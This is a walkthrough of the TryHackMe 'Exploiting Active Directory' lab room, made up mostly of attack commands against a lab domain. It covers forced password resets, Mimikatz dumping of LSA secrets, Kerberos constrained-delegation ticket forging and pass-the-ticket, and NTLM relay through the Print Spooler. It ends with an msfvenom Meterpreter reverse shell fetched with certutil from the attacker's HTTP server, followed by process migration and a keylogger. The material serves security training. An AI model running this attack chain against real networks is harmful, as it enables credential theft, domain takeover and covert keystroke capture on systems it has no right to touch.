Exploiting Active Directory

Room Link: https://tryhackme.com/room/exploitingad

Introduction

Kali

systemd-resolve --interface exploitad --set-dns $THMDCIP --set-domain za.tryhackme.loc
nslookup thmdc.za.tryhackme.loc 

Kali

ssh za.tryhackme.loc\$VICTIM_USERNAME@thmwrk1.za.tryhackme.loc

Exploiting Permission Delegation

Kali

neo4j console start

Kali

bloodhound --no-sandbox

Victim(powershell)

powershell
Add-ADGroupMember "IT Support" -Members "$VICTIM_USERNAME"
Get-ADGroupMember -Identity "IT Support"

ForceChangePassword

Now that we are a member of the IT Support group, we have inherited the ForceChangePassword Permission Delegation over the Tier 2 Admins group. First, we need to identify the members of this group to select a target. We can use the Get-ADGroupMember cmdlet again to assist with this:

Victim(powershell)

Get-ADGroupMember -Identity "Tier 2 Admins"

Victim(powershell)

$Password = ConvertTo-SecureString "New.Password.For.User" -AsPlainText -Force 
Set-ADAccountPassword -Identity "t2_henry.harvey" -Reset -NewPassword $Password 

Note: If you get an Access Denied error, your permissions have not yet propagated through the domain. This can take up to 10 minutes. The best approach is to terminate your SSH or RDP session, take a quick break, and then reauthenticate and try again. You could also run gpupdate /force and then disconnect and reconnect, which in certain cases will cause the synchronisation to happen faster.

Kali

ssh t2_henry.harvey@thmwrk1.za.tryhackme.loc
Password: New.Password.For.User

Exploiting Kerberos Delegation

Constrained Delegation Exploitation

We will exploit Constrained Delegation for this task. The first thing we need to do is enumerate available delegations. Let's use our new privileged user for the network couple of commands. We can use the Get-NetUser cmdlet of PowerSploit for this enumeration by running the following command.

Victim(powershell)

powershell
Import-Module C:\Tools\PowerView.ps1 
Get-NetUser -TrustedToAuth

Based on the output of this command, we can see that the svcIIS account can delegate the HTTP and WSMAN services on THMSERVER1. You would think that this means we can only access websites on behalf of impersonated users. However, PowerShell Remoting uses the HTTP and WSMAN services as well. The ideal option would be to impersonate a Tier 1 Admin since this would provide us with administrative access over THMSERVER1.

If you were to perform proper post-exploitation enumeration of THMWRK1, you would find that there is a service on the host running as the svcIIS user. Since we have administrative access now, we can use this to dump LSASecrets, part of the Windows Registry Hive where credentials are stored for features such as Windows services. Let's use Mimikatz to dump the secrets.

Victim(powershell)

C:\Tools\mimikatz_trunk\x64\mimikatz.exe

Victim(mimikatz)

token::elevate
lsadump::secrets

Let's run through the two commands:

• token::elevate - To dump the secrets from the registry hive, we need to impersonate the SYSTEM user.

• lsadump::secrets - Mimikatz interacts with the registry hive to pull the clear text credentials.

Now that we have access to the password associated with the svcIIS account, we can perform a Kerberos delegation attack. We will use a combination of Kekeo and Mimikatz. You can use another window for Mimikatz, but make sure to exit out of Mimikatz after the token::elevate command, otherwise the tickets will be loaded in the wrong context later on. We will use Kekeo to generate our tickets and then use Mimikatz to load those tickets into memory. Let's start by generating the tickets:

Victim(powershell)

C:\Tools\kekeo\x64\kekeo.exe

Victim(kekeo)

tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@

Parameters explained:

• user - The user who has the constrained delegation permissions.

• domain - The domain that we are attacking since Kekeo can be used to forge tickets to abuse cross-forest trust.

• password - The password associated with the svcIIS account.

Now that we have the TGT for the account that can perform delegation, we can forge TGS requests for the account we want to impersonate. We need to perform this for both HTTP and WSMAN to allow us to create a PSSession on THMSERVER1:

Victim(kekeo)

tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.l
oc

exit

Parameters explained:

• tgt - We provide the TGT that we generated in the previous step.

• user - The user we want to impersonate. Since t2_ accounts have administrative access over workstations, it is a safe assumption that t1_ accounts will have administrative access over servers, so choose a t1_ account that you would like to impersonate.

• service - The services we want to impersonate using delegation. We first generate a TGS for the HTTP service. Then we can rerun the same command for the WSMAN service.

Run the command again, this time for the WSMAN service. Now that we have the two TGS tickets, we can use Mimikatz to import them:

Victim(powershell)

C:\Tools\mimikatz_trunk\x64\mimikatz.exe

Victim(mimikatz)

privilege::debug
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
exit

Victim(powershell)

klist
New-PSSession -ComputerName thmserver1.za.tryhackme.loc

Victim(powershell)

Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

Exploiting Automated Relays

Machine Accounts

This query will attempt to find instances where a computer has the "AdminTo" relationship over another computer. You should see output similar to this

Custom Query

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

This is very interesting. It shows us that the THMSERVER2 machine account has administrative privileges over the THMSERVER1 machine.

Print Spooler Service

Victim(powershell) - THMWRK1

GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

The output from the cmdlet verifies that the service is running. If we get an access denied error, you could perhaps attempt the PowerShell command of Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc. However, Microsoft has been cracking down viewing these ports from the network's perspective. If both give you an error, you may just need to take a leap of faith. Thus, condition three has been met.

SMB Signing

In order to relay the coerced authentication attempt, SMB signing should not be enforced. It should be noted that there is a difference between SMB signing being allowed and SMB signing being enforced. Since some legacy systems do not support SMB signing, by default, the configuration of SMB is that signing is allowed but not enforced, meaning that it will only be used if supported. Since we will be hosting a malicious SMB server, we can ensure our server does not support signing, forcing the target not to sign the SMB authentication attempt.

To verify that THMSERVER1 and THMSERVER2 do not have SMB signing enforced, we can use Nmap on our AttackBox.

Kali

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc 

We can see that SMB signing is enabled but not enforced based on the output. This means all our conditions are met, and we can start the attack!

Exploiting Authentication Relays

Note: This attack can be unstable. Abusing the Print Spooler service may cause it to crash, and a callback is not always guaranteed. For this reason, the previous task already provided you with the permissions required to continue. However, understanding authentication relays and how to force them is essential for AD exploitation. As such, the steps to perform such an attack are provided below. You can decide to give it a go, but a callback is not guaranteed. If it does not work, move on to the next task and perhaps explore this again at the end of your room journey.

We will be using SpoolSample to exploit the authentication relay. It is a C# exploit but has already been compiled for you and stored in the C:\Tools\ directory on THMWRK1. We will use Spoolsample.exe to coerce THMSERVER2 to authenticate to us on our AttackBox and then Impacket's ntlmrelayx.py to relay the authentication attempt THMSERVER1. Note that if you are using your own VM, you will need to make sure you have the updated version of Impacket that supports SMBv2.

The first step is to set up the NTLM relay. On our AttackBox, we can use the following:

Kali

python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"$THMSERVER1IP" -debug

If we specify the hostname of THMSERVER1 instead of the IP, the host could request that we use Kerberos authentication instead of NTLM. Hence we should specify the IP instead. With the relay listening, we can now coerce THMSERVER2 to authenticate to us. In an SSH terminal on THMWRK1, execute the following.

Victim - THMWRK1

C:\Tools\SpoolSample.exe THMSERVER2.za.tryhackme.loc $KALIIP

Exploiting AD Users

Kali #1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=exploitad LPORT="1337" -f psh -o shell.ps1
python2 -m SimpleHTTPServer 81

Kali #2

sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST exploitad; set LPORT "1337'; exploit"

Victim(cmd)

certutil.exe -urlcache -split -f http://$KALI:81/shell.ps1
powershell
.\shell.ps1

Victim(meterpreter)

ps | grep "explorer"
migrate 3612
getuid
keyscan_start
keyscan_dump
keyscan_stop